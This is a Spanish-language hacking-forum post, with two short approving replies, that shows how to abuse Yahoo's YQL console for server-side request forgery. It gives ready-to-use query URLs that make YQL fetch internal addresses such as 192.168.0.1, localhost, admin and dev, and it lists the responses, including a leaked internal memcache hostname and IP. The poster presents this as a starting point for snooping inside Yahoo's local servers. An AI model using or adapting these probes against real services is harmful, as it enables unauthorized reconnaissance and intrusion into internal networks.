Vamos a convertirnos en trolls por un par de minutos y vamos a darle un vistazo a la consola QL de Yahoo la cual permite realizar multiples consultas a distintas apis de Yahoo pero a modo de SQL.
Ejemplo de una simple query:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=show tables (http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=show%20tables)
Esto nos devolverá todas las tablas (servicios, apis).
Ahora probaremos utilizar la api HTML de la siguiente manera:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://underc0de.org/foro/" (http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select%20*%20from%20html%20where%20url%20=%20"http://underc0de.org/foro/")
Esto nos devolverá el contenido HTML parseado en XML.
Ahora que ya entendimos un poco sobre el funcionamiento de YQL vamos a trollear un poco:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/" (http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select%20*%20from%20html%20where%20url%20=%20"http://192.168.1.1/")
Nos retornará:
<url ... http-status-code="502" http-status-message="Network is unreachable">http://192.168.1.1/</url>
Pero si intentamos entrar a la subred local 0.1: http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.0.1/" (http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select%20*%20from%20html%20where%20url%20=%20"http://192.168.0.1/")
<url ... http-status-code="403" http-status-message="Forbidden">http://192.168.0.1/</url>
Esto nos demuestra una cosa: que la api de peticiones HTTP no filtra ips ni dominios :D asi que podemos pasearnos por toda la red local si queremos ya que al intentar entrar a la puerta predeterminada de enlace (router o switch o lo que sea) nos arrojó un error 403 que probablemente haya retornado el panel de administración del router ya que cuando probamos con otras ips locales simplemente nos dice que es imposible conectarse (error 502 Cannot find server).
Probamos otras urls sensibles:
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403 (necesita autorización, ¿como?: buena pregunta)
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://admin/login/ : Timed out waiting for operation - failing node: memcache4.yql.bf1.yahoo.com/68.142.224.71:11211
http://68.142.224.71/ : 502 - Connection refused
http://local/ : 404 - Not Found Tenemos acceso a un servidor WEB local!
http://dev/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://developer/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request
Información útil para comenzar a husmear dentro de los servidores locales de yahoo :)
Saludos.
muy buena info :)
Muy bueno tio!!